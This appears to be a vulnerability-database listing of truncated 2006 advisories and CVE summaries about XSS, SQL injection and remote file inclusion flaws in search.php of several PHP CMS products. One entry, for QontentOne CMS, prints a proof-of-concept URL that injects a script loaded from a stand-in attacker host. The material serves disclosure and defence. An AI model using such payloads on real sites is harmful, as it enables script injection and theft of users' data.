Cross site scripting

Cross-site scripting XSS vulnerability in search.php in QontentOne CMS allows remote attackers to inject arbitrary web script or HTML via the searchphrase parameter...

CVE-2006-2726

PHP remote file inclusion vulnerability in Fastpublish CMS 1.6.9.d allows remote attackers to include arbitrary files via the configfsBase parameter in 1 drucken.php, 2 drucken2.php, 3 emailanbenutzer.php, 4 rechnung.php, 5 suche/search.php and 6 adminbereich/admin.php...

Remote file inclusion

PHP remote file inclusion vulnerability in Fastpublish CMS 1.6.9.d allows remote attackers to include arbitrary files via the configfsBase parameter in 1 drucken.php, 2 drucken2.php, 3 emailanbenutzer.php, 4 rechnung.php, 5 suche/search.php and 6 adminbereich/admin.php...

Sql injection

SQL injection vulnerability in search.php in Open Searchable Image Catalogue OSIC 0.7.0.1 and earlier allows remote attackers to inject arbitrary SQL commands via the 1 txtCustomField and 2 CustomFieldID array parameters...

CVE-2006-2751

The CVE-2006-2751 entry describes a cross-site scripting (XSS) vulnerability in Open Searchable Image Catalogue (OSIC) versions up to 0.7.0.1 and earlier. The affected component is the search.php handler where the item_list parameter is used in a way that allows remote attackers to inject arbitra...

CVE-2006-2749

SQL injection vulnerability in search.php in Open Searchable Image Catalogue OSIC 0.7.0.1 and earlier allows remote attackers to inject arbitrary SQL commands via the 1 txtCustomField and 2 CustomFieldID array parameters...

CVE-2006-2749

CVE-2006-2749 is a SQL injection vulnerability in the Open Searchable Image Catalogue (OSIC) before or equal to 0.7.0.1, specifically in search.php. The underlying flaw allows remote attackers to inject arbitrary SQL via the (1) txtCustomField and (2) CustomFieldID array parameters. Affected prod...

QontentOneCMS v1.0

QontentOneCMS v1.0 homepage: http://www.qontentone.com/ Effected files: search.php input forms XSS Proof of concept: http://www.example.com/search.php?searchphrase="SCRIPT SRC=http://www.evilsite.com/xss.js/SCRIPT"&search=Search...

CVE-2006-2650

The CVE-2006-2650 entry documents an SQL injection in CosmicShoppingCart, specifically in cosmicshop/search.php, exploitable via the max parameter. The vulnerability allows remote attackers to craft arbitrary SQL commands executed by the database. The affected component is the search functionalit...

CosmicShoppingCart - 'search.php' SQL Injection

Software: CosmicShoppingCart www.cosmicphp.com Risk: Medium Discovered by: Vympel Marcelo Almeida Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed. SQL injections have been found, they could be exploited by users to retrieve the...

CosmicShoppingCart - search.php SQL Injection

CosmicShoppingCart - search.php SQL Injection Software: CosmicShoppingCart www.cosmicphp.com Risk: Medium Discovered by: Vympel Marcelo Almeida Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed. SQL injections have been found, th...

ipb search.php vulnerability analysis and thinking-vulnerability warning-the black bar safety net

Author: SuperHeiAtph4nt0m.org Blog: http://superhei.blogbus.com/ Team: http://www.ph4nt0m.org Data: 2006-04-27 Simple analysis The vulnerability is another one of pregreplace+/e vulnerability,代码 在 \sources\actionadmin\search.php line 1 2 5 8-1 2 6 a 2: if $this-ipsclass-input'lastdate' $this-outp...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in search.php in Sphider allow remote attackers to inject arbitrary web script or HTML via 1 the PATHINFO and 2 the category parameter...

CVE-2006-2506

Multiple cross-site scripting XSS vulnerabilities in search.php in Sphider allow remote attackers to inject arbitrary web script or HTML via 1 the PATHINFO and 2 the category parameter...

CVE-2006-2506

CVE-2006-2506 affects Sphider’s search.php, enabling multiple XSS via PATH_INFO and the category parameter. The available connected documents confirm the vulnerable component and vectors but do not provide specific version numbers, exploit details, or remediation within the supplied material. The...

SaPHPLession30.txt

SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --: 1- Unfilter array Filename :- show.php Line :- 102 code $hrow = $Row2;/code Fix :- Add To Line 11 /show.php This Code :- we add the code to global to fix all unfilter ver. at the code : code $hrow = array;/code Exploit :- GET ^...

neo-Advisory-20.txt

/ --------------------------------------------------------------- Neo Security Team NST® Advisory 20 --------------------------------------------------------------- Program : CuteNews 1.4.1 Homepage: http://www.cutephp.com Vulnerable Versions: CuteNews 1.4.1 & lower ones Risk: Medium! Impact: Cro...

Sql injection

SQL injection vulnerability in search.php in Servous sBLOG 0.7.2 allows remote attackers to execute arbitrary SQL commands via the keyword parameter. NOTE: this issue can be used to trigger path disclosure. In addition, it might be primary to vector 1 in CVE-2006-1135...

Cross site scripting

Cross-site scripting XSS vulnerability in search.php in PHPKB Knowledge Base allows remote attackers to inject arbitrary web script or HTML via the searchkeyword parameter. NOTE: the issue was originally disputed by the vendor, but on 20060519, the vendor notified CVE that "We have fixed all the...

CVE-2006-2184

Cross-site scripting XSS vulnerability in search.php in PHPKB Knowledge Base allows remote attackers to inject arbitrary web script or HTML via the searchkeyword parameter. NOTE: the issue was originally disputed by the vendor, but on 20060519, the vendor notified CVE that "We have fixed all the...